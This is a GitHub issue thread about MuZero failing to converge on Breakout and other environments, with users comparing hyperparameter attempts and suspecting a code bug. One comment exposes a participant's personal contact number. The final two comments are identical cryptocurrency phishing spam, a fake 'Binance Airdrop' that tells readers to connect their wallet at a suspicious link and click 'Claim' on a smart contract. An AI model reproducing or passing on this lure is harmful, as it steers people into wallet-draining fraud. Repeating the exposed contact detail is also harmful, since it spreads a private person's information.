### ISSUE TITLE
The model does not converge for breakout

### ISSUE THREAD

**Issue by yungangwu** [werner-duvaud/muzero-general#211]
### Search before asking

- [X] I have searched the MuZero [issues](https://github.com/werner-duvaud/muzero-general/issues) and found no similar feature requests.

### Description

I trained muzero for breakout with the hyperparameters given in the code, but up to 450,000 steps, its reward was still 0 and showed no convergence. So I would like to ask, are the hyperparameters in the code validated hyperparameters? Thank, you!

**Comment by JohnPPP** [comment]
Same issue here, but for all envs.

A quinta, 20/10/2022, 03:58, yungangwu ***@***.***> escreveu:

**Comment by yungangwu** [comment]
Have you tried any other parameter Settings? For example, if batch_size is set to 1024, does the model converge under certain hyperparameter Settings? @JohnPPP

**Comment by yungangwu** [comment]
@

**Comment by JohnPPP** [comment]
Tried a bunch of hyperparameters on a bunch of games. Just wasted my time.
Perhaps others can show me how can this work...

A quinta, 20/10/2022, 07:47, yungangwu ***@***.***> escreveu:

**Comment by yungangwu** [comment]
gg.  I also met the same problem, did a lot of experiments, but nothing happened, I don't know if there is a mistake in the code. @JohnPPP

**Comment by JohnPPP** [comment]
Yeah, probably is.

A quinta, 20/10/2022, 09:31, yungangwu ***@***.***> escreveu:

**Comment by dillonmsandhu** [comment]
Did the reward stay zero the entire time, or did it occasionally get some reward? I have it working on cartpole, but not on Atari. That said, it still gets a reward of 2 or 3 occasionally in breakout, indicating that it is behaving randomly.

**Comment by zsn2021** [comment]
I also encountered the same problem. I adjusted the super parameters for a long time, but I couldn't learn a good effect in my environment

**Comment by yungangwu** [comment]
Yes, I have this problem. I also experimented with another code, muzero-pytorch, on gomoku games, but I adjusted for a long time and didn't get the ideal results. 



---Original---
From: ***@***.***&gt;
Date: Sat, Dec 31, 2022 23:25 PM
To: ***@***.***&gt;;
Cc: ***@***.***&gt;;"State ***@***.***&gt;;
Subject: Re: [werner-duvaud/muzero-general] The model does not converge forbreakout (Issue #211)




 
I also encountered the same problem. I adjusted the super parameters for a long time, but I couldn't learn a good effect in my environment

**Comment by zsn2021** [comment]
Is there a possibility that many networks need to be learned, leading to decision failure.
If you can, you can add a contact information and we can communicate privately

**Comment by yungangwu** [comment]
Yes, that's why I guess, probably because it has three series networks need to optimize together, so very careful training to converge. As far as contact information, I'm using the wechat app. Do you know this app?

**Comment by zsn2021** [comment]
您可以加我的微信联系方式
13162062294

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
